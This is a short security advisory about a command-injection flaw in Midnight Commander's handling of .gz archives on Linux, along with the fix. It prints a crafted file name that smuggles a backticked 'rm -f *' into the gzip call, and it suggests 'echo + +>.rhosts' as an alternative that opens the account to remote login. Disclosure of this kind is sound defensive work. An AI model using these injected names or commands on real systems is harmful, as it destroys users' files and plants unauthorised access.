COMMAND

    Midnight Commander

SYSTEMS AFFECTED

    Linux

PROBLEM

    Michal  Zalewski  discovered  a  problem with Midnight Commander's
    method of decompressing archives, which allows execution of hidden
    commands.  This problem  isn't serious for experienced  users, but
    with the non-experienced ones  may result with rather  bad effects
    for poor guy.  Evil file may be prepared this way:

        $ gzip foo
        $ mv foo.gz "quake2-test-unknown-linux-'\`rm -f *\`'-elf-i386-generic-beta.gz"

    Now, this filename, when displayed by user-friendly programs  (www
    or  ftp  browsers,  file  managers),  will  be cropped to fit in a
    window.  Under my mc (vidmode 11) it's displayed as:

        quake2-test-unknown-linu~-i386-generic-beta.gz

    When  viewing  or  editing  .gz  archive  (F3/F4/ENTER) - Midnight
    Commander calls gzip from a shell script created in /tmp:

        gzip -dc 'filename' 2>/dev/null

    That may be dangerous. In above case, this script is equal to:

        gzip -dc 'quake2-test-unknown-linux--elf-i386-generic-beta.gz' 2>/dev/null
        rm -f *

    'rm -f *' may be replaced with 'echo + +>.rhosts'.

SOLUTION

    This problem  has been  fixed in  the recent  editions of  the GNU
    Midnight Commander by Norbert Warmuth.  Recent version of the  GNU
    Midnight Commander  do not  have this  problem.   To get  a recent
    version of the program, check:

        ftp://ftp.nuclecu.unam.mx/linux/local

    for the latest stable release of the program.